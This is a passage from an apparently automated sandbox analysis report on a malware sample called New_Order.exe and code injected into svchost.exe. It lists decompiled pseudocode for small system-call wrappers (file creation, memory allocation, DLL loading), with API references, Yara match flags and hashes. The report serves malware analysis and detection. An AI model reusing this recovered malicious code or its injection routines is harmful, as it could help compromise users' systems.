                                                                        0x00403896
                                                                        0x0040389c
                                                                        0x004038a0
                                                                        0x004038a1
                                                                        0x004038a9

                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,7519FA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                                        • GlobalFree.KERNEL32 ref: 00403896
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Free$GlobalLibrary
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 1100898210-823278215
                                                                        • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                        • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                                        • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                        • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405AD6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405AD6(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                        0x00405ad7
                                                                        0x00405ae1
                                                                        0x00405ae3
                                                                        0x00405aea
                                                                        0x00405af2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405af2
                                                                        0x00405af4
                                                                        0x00405af9

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New_Order.exe,C:\Users\user\Desktop\New_Order.exe,80000000,00000003), ref: 00405ADC
                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New_Order.exe,C:\Users\user\Desktop\New_Order.exe,80000000,00000003), ref: 00405AEA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CharPrevlstrlen
                                                                        • String ID: C:\Users\user\Desktop
                                                                        • API String ID: 2709904686-1246513382
                                                                        • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                        • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                                        • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                        • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405BF5, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                        0x00405c05
                                                                        0x00405c07
                                                                        0x00405c0a
                                                                        0x00405c36
                                                                        0x00405c0f
                                                                        0x00405c18
                                                                        0x00405c1d
                                                                        0x00405c28
                                                                        0x00405c2b
                                                                        0x00405c47
                                                                        0x00405c2d
                                                                        0x00405c34
                                                                        0x00000000
                                                                        0x00405c34
                                                                        0x00405c40
                                                                        0x00405c44
                                                                        0x00405c44
                                                                        0x00405c3e
                                                                        0x00000000

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
                                                                        • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                        • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                                        • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                        • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Analysis Process: svchost.exe PID: 6252 Parent PID: 6216 svchost.exeCOMMON

                                                                        Executed Functions

                                                                        Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 37%
                                                                        			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                        0x00418273
                                                                        0x0041827f
                                                                        0x00418287
                                                                        0x00418292
                                                                        0x004182ad
                                                                        0x004182b5
                                                                        0x004182b9

                                                                        APIs
                                                                        • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: R=A$R=A
                                                                        • API String ID: 2738559852-3742021989
                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				intOrPtr* _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0(_t17,  &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                        0x00409b3c
                                                                        0x00409b3f
                                                                        0x00409b44
                                                                        0x00409b49
                                                                        0x00409b53
                                                                        0x00409b58
                                                                        0x00409b5b
                                                                        0x00409b5d
                                                                        0x00409b65
                                                                        0x00409b6a
                                                                        0x00409b6a
                                                                        0x00409b71
                                                                        0x00409b79
                                                                        0x00409b7c
                                                                        0x00409b7e
                                                                        0x00409b92
                                                                        0x00000000
                                                                        0x00409b94
                                                                        0x00409b9a
                                                                        0x00409b4e
                                                                        0x00409b4e
                                                                        0x00409b4e

                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004182EA, Relevance: 1.5, APIs: 1, Instructions: 44nativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E004182EA(void* __edx, void* __esi, void* __eflags, void* _a4) {
				intOrPtr _v0;
				void* _t9;
				void* _t10;

				if(__eflags < 0) {
					_t10 = _t9 + 0xb0;
					if (_t10 == 0) goto L5;
				} else {
					__ebp = __esp;
					__eax = _v0;
					_t6 = __eax + 0x10; // 0x300
					_push(__esi);
					_t7 = __eax + 0xc50; // 0x409743
					__esi = _t7;
					__eax = E00418DC0(__edi, _v0, __esi,  *_t6, 0, 0x2c);
					__edx = _a4;
					 *__esi = NtClose(_a4);
					asm("rcr byte [esi+0x5d], 1");
					return _t10;
				}
			}






                                                                        0x004182ee
                                                                        0x004182bd
                                                                        0x004182bf
                                                                        0x004182f0
                                                                        0x004182f1
                                                                        0x004182f3
                                                                        0x004182f6
                                                                        0x004182f9
                                                                        0x004182ff
                                                                        0x004182ff
                                                                        0x00418307
                                                                        0x0041830c
                                                                        0x00418315
                                                                        0x00418316
                                                                        0x00418319
                                                                        0x00418319

                                                                        APIs
                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: ce7febc0e0f999cbe590c3e8f2e4f3f9faa0a8ced1aefdb6e62ccb90fdfb4a61
                                                                        • Instruction ID: 46fd17f8ea7b8739283a53de088cfe90328876dba864404b12c831929fb87a91
                                                                        • Opcode Fuzzy Hash: ce7febc0e0f999cbe590c3e8f2e4f3f9faa0a8ced1aefdb6e62ccb90fdfb4a61
                                                                        • Instruction Fuzzy Hash: 21F04F712002147BD714EF99DC89ED777A8EF49750F15849DFA1C5B292DA34E90086E4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004181BA, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004181BA(void* __ecx, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _v326412976;
				long _t22;
				void* _t36;

				_t16 = _a4;
				_t4 = _t16 + 0xc40; // 0xc40
				E00418DC0(_t36, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}






                                                                        0x004181c3
                                                                        0x004181cf
                                                                        0x004181d7
                                                                        0x0041820d
                                                                        0x00418211

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: f9c86d653952326fbb6359b8eabd820d8c154286c6d240fdb1bd1733d4172ae0
                                                                        • Instruction ID: d8b7b186e317e85db12af468f5bb3ef09c84c760bff965db9117585e58897c97
                                                                        • Opcode Fuzzy Hash: f9c86d653952326fbb6359b8eabd820d8c154286c6d240fdb1bd1733d4172ae0
                                                                        • Instruction Fuzzy Hash: A501B2B2201248AFDB48CF98DC94EEB77A9AF8C754F15824CFA0D97241C630EC51CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                        0x004181cf
                                                                        0x004181d7
                                                                        0x0041820d
                                                                        0x00418211

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041839B, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E0041839B(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t18;
				void* _t25;

				asm("les eax, [esi]");
				asm("aam 0x55");
				_t14 = _a4;
				_t4 = _t14 + 0xc60; // 0xca0
				E00418DC0(_t25, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t18 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t18;
			}





                                                                        0x0041839d
                                                                        0x0041839f
                                                                        0x004183a3
                                                                        0x004183af
                                                                        0x004183b7
                                                                        0x004183d9
                                                                        0x004183dd

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 4329753037f38a6a7842ff8004b00154d6e16da1af9c554c650a8edbe8e8e001
                                                                        • Instruction ID: d7ed81dffac7f357383218509bbb4846abd72b672a40a630d302af3b1b4545dc
                                                                        • Opcode Fuzzy Hash: 4329753037f38a6a7842ff8004b00154d6e16da1af9c554c650a8edbe8e8e001
                                                                        • Instruction Fuzzy Hash: ACF0F8B2200218ABCB14DF89DC81EEB77A9EF88354F11865DFE5997241CA30E955CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                        0x004183af
                                                                        0x004183b7
                                                                        0x004183d9
                                                                        0x004183dd

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E004182F0(void* __esi, intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8);
				asm("rcr byte [esi+0x5d], 1");
				return _t8;
			}





                                                                        0x004182f3
                                                                        0x004182f6
                                                                        0x004182ff
                                                                        0x00418307
                                                                        0x00418315
                                                                        0x00418316
                                                                        0x00418319

                                                                        APIs
                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2b9a69f9e48666356d5c8a89237c0b42e467cd1ce66741125392214a6243cc9e
                                                                        • Instruction ID: df1dfbf18abbf79599b2a8d495042003c826c4a26089962c225452441f7bcd95
                                                                        • Opcode Fuzzy Hash: 2b9a69f9e48666356d5c8a89237c0b42e467cd1ce66741125392214a6243cc9e
                                                                        • Instruction Fuzzy Hash: E190027120154802E100A159481470B00459BD0742F55C011A1155559D8765885175B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f1076bcf835eb36e2946c858b703792cecd057a19b239cd410f4fd7a0ff9b56a
                                                                        • Instruction ID: 58cc64d4564b2b34f3427c3b78f8ad89de1506b48b715627c0e1fa4960b9e9c0
                                                                        • Opcode Fuzzy Hash: f1076bcf835eb36e2946c858b703792cecd057a19b239cd410f4fd7a0ff9b56a
                                                                        • Instruction Fuzzy Hash: 71900261601144425140B16988449064045BFE1651755C121A0989554D8699886566A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 896295af948e1a7cb93a1e4e4cee31b3d7d558df7fff128f088e8c7d4b39036f
                                                                        • Instruction ID: 954e8f3fc53bd5f337bab6af7f9df5f949e347937bed051a83c30bd9a0c24196
                                                                        • Opcode Fuzzy Hash: 896295af948e1a7cb93a1e4e4cee31b3d7d558df7fff128f088e8c7d4b39036f
                                                                        • Instruction Fuzzy Hash: EA90026121194442E200A5694C14B0700459BD0743F55C115A0145558CCA5588616561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 039699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: bd246fbe320d329a7731b67f6d56976ed19398e604c86d1b434fc7157fed2527
                                                                        • Instruction ID: d0d2fe332231c207f54f14432b57c18cf3d73b4f98376776d871c24281606a3a
                                                                        • Opcode Fuzzy Hash: bd246fbe320d329a7731b67f6d56976ed19398e604c86d1b434fc7157fed2527
                                                                        • Instruction Fuzzy Hash: 909002A134114842E100A1594414B060045DBE1741F55C015E1055558D8759CC527166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 550485f661ad95fce927bc9be8e76977fc40580c428964601ceec6980a25d92f
                                                                        • Instruction ID: de9a22a77899443d0dd4bacdab7b1b19b8c4e2db96d516b99fb38f1e2f64f2e7
                                                                        • Opcode Fuzzy Hash: 550485f661ad95fce927bc9be8e76977fc40580c428964601ceec6980a25d92f
                                                                        • Instruction Fuzzy Hash: 469002B120114802E140B159440474600459BD0741F55C011A5055558E87998DD576A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 039698F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 81f29a786f09efb7dec7e0bedf50d999ac4cd717652715e81db888bf95a4125b
                                                                        • Instruction ID: 2b04f1c4a2b4a31892d6267c9b9eea7a7be7906c42f5abc577cf7b9a8f718c38
                                                                        • Opcode Fuzzy Hash: 81f29a786f09efb7dec7e0bedf50d999ac4cd717652715e81db888bf95a4125b
                                                                        • Instruction Fuzzy Hash: 0B90026160114902E101B1594404616004A9BD0681F95C022A1015559ECB658992B171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
